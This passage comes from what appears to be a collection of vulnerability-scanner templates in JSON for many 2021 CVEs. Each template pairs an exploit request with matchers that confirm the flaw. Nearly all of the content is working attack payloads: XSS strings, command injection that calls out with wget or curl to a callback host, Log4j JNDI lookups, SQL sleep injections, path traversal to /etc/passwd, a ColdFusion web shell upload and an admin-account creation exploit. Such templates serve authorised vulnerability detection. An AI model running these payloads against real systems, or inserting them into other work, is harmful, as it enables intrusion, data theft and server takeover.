criteria."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25085","info":{"name":"WOOF WordPress plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"additional_fields\":[\"<img src=x onerror=alert(document.domain)>\"]}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1497","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /auth/change HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n","POST /auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-24274","info":{"name":"WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/ultimate-maps-by-supsystic/modules/maps/css/"],"condition":"and"}]},{"raw":["GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40856","info":{"name":"Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /about/../tree?action=get HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"TYPE\"","\"ITEMS\"","\"COUNT\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29484","info":{"name":"Ghost CMS <=4.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ghost/preview"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XMLHttpRequest.prototype.open"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-1498","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /storfs-asup HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25646","info":{"name":"Apache Druid - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"type\":\"index\",\n\"spec\":{\n   \"ioConfig\":{\n      \"type\":\"index\",\n      \"firehose\":{\n         \"type\":\"local\",\n         \"baseDir\":\"/etc\",\n         \"filter\":\"passwd\"\n      }\n   },\n   \"dataSchema\":{\n      \"dataSource\":\"odgjxrrrePz\",\n      \"parser\":{\n         \"parseSpec\":{\n            \"format\":\"javascript\",\n            \"timestampSpec\":{\n\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n            \"\":{\n               \"enabled\":\"true\"\n            }\n         }\n      }\n   }\n},\n\"samplerConfig\":{\n   \"numRows\":10\n}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["numRowsRead","numRowsIndexed"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29442","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42551","info":{"name":"NetBiblio WebOPAC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x","{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SearchTerm: 'x'+alert(1)+'x',","SearchTerm: 'x\\\\'+alert(1),//',"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["NetBiblio"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25033","info":{"name":"Noptin < 1.6.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-21975","info":{"name":"vRealize Operations Manager API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /casa/nodes/thumbprints HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n[\"127.0.0.1:443/ui/\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vRealize Operations Manager","thumbprint","address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3110","info":{"name":"PrestaShop 1.7.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2021-24554","info":{"name":"WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"paytm-settings_page_wp_paytm_donation\")"],"condition":"and"}]}]},{"id":"CVE-2021-24165","info":{"name":"WordPress Ninja Forms <3.4.34 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 302","contains(header_2, 'Location: https://interact.sh?client_id=1')"],"condition":"and"}]}]},{"id":"CVE-2021-24987","info":{"name":"WordPress Super Socializer <7.13.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"facebook_urls\":[[\"<img src=x onerror=alert(document.domain)>\"]]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20123","info":{"name":"Draytek VigorConnect 1.6.0-B - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything","{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42663","info":{"name":"Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</i><script>alert(document.domain)</script></div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39226","info":{"name":"Grafana Snapshot - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/snapshots/:key"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"isSnapshot\":true"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41467","info":{"name":"JustWriting  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41653","info":{"name":"TP-Link - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi?2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\ndataBlockSize=64\ntimeout=1\nnumberOfRepetitions=4\nhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\nX_TP_ConnName=ewan_ipoe_d\ndiagnosticsState=Requested\n","POST /cgi?7 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-34640","info":{"name":"WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET //wp-admin/options-general.php/\"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31537","info":{"name":"SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>confirm({{randstr}})</script>","SIS-REWE"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-21389","info":{"name":"BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-json/buddypress/v1/signup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\n  \"user_login\":\"{{randstr}}\",\n  \"password\":\"{{randstr}}\",\n  \"user_name\":\"{{randstr}}\",\n  \"user_email\":\"{{randstr}}@interact.sh\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["user_login","registered","activation_key","user_email"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3378","info":{"name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: application/json\nReferer: {{BaseURL}}\nConnection: close\nX-Requested-With: XMLHttpRequest\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\nContent-Type: image/png\n\n{{randstr}}\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n","GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header","words":["text/plain","ASP.NET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21985","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n"],"matchers":[{"type":"word","part":"body","words":["{\"result\":{\"isDisconnected\":"]}]}]},{"id":"CVE-2021-27670","info":{"name":"Appspace 6.2.4 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44152","info":{"name":"Reprise License Manager 14.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/menu"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Administration Commands"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24435","info":{"name":"WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["(?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?","<p>Grumpy wizards make"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25016","info":{"name":"Chaty < 2.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["search=</script><img src onerror=alert(document.domain)>","chaty_page_chaty"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44228","info":{"name":"Apache Log4j2 Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":null},{"type":"regex","group":2,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"},{"type":"regex","group":1,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-29441","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: Nacos-Server\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 403","status_code_2 == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body_1, 'Forbidden')","body_2 == 'true'"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-21307","info":{"name":"Lucee Admin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=a\n","POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=\n<cfoutput>\n\n<table>\n<form method=\"POST\" action=\"\">\n<tr><td>Command:</td><td><input type=test name=\"cmd\" size=50\n<cfif isdefined(\"form.cmd\")>value=\"#form.cmd#\"</cfif>><br></td></tr>\n<tr><td>Options:</td><td> <input type=text name=\"opts\" size=50\n<cfif isdefined(\"form.opts\")>value=\"#form.opts#\"</cfif>><br></td></tr>\n<tr><td>Timeout:</td><td> <input type=text name=\"timeout\" size=4\n<cfif isdefined(\"form.timeout\")>value=\"#form.timeout#\"\n<cfelse> value=\"5\"</cfif>></td></tr>\n</table>\n<input type=submit value=\"Exec\" >\n</form>\n<cfif isdefined(\"form.cmd\")>\n<cfsavecontent variable=\"myVar\">\n<cfexecute name = \"#Form.cmd#\"\narguments = \"#Form.opts#\"\ntimeout = \"#Form.timeout#\">\n</cfexecute>\n</cfsavecontent>\n<pre>\n","POST /lucee/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id&opts=&timeout=5\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-34621","info":{"name":"WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_username\"\n\n{{randstr}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_email\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password_present\"\n\ntrue\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_first_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_last_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wp/?page_id=18\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"pp_current_url\"\n\n{{BaseURL}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_form_id\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"action\"\n\npp_ajax_signup\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"melange_id\"\n\n\n-----------------------------138742543134772812001999326589--\n","POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nlog={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to your WordPress Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21972","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["VSPHERE-UI-JSESSIONID"],"condition":"and"},{"type":"regex","part":"body","regex":["(Install|Config) Final Progress"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34805","info":{"name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24406","info":{"name":"WordPress wpForo Forum < 1.9.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-24340","info":{"name":"WordPress Statistics <13.0.8 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"WP Statistics\")"],"condition":"and"},{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 500","contains(body_2, \">WordPress &rsaquo; Error<\") && contains(body_2, \">Your request is not valid.<\")"],"condition":"and"}]}]},{"id":"CVE-2021-43062","info":{"name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Svg/onload=alert(document.domain)>","FortiMail Click Protection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40969","info":{"name":"Spotweb <= 1.5.1 - Cross 